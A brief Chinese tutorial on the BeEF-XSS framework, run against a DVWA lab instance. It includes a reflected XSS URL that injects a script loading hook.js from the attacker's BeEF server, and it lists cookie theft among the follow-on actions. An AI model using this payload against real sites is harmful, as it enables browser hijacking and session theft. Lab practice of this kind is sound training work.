简介：BeEF-XSS是一款非常强大的web框架攻击平台，集成了许多payload，可以实现许多功能！

一、安装beef-xss

输入beef-xss，提示安装，输入y

二、启动beef-xss

三、访问登陆页面：

http://192.168.139.133:3000/ui/panel

四、让目标主机访问存在生成的钩子代码

http://192.168.139.129:81/dvwa/vulnerabilities/xss_r/?name=<script src="http://192.168.139.133:3000/hook.js" rel="external nofollow" ></script>

五、获取控制权限

绿色模块：表示模块适用当前用户，并且执行结果对用户不可见

红色模块：表示模块不适用当前用户，有些红色模块也可以执行

橙色模块：模块可用，但结果对用户可见

灰色模块：模块为在目标浏览器上测试过

1、获取cookies

2、获取网页源码

3、让目标主机弹出提示信息

禁止非法，后果自负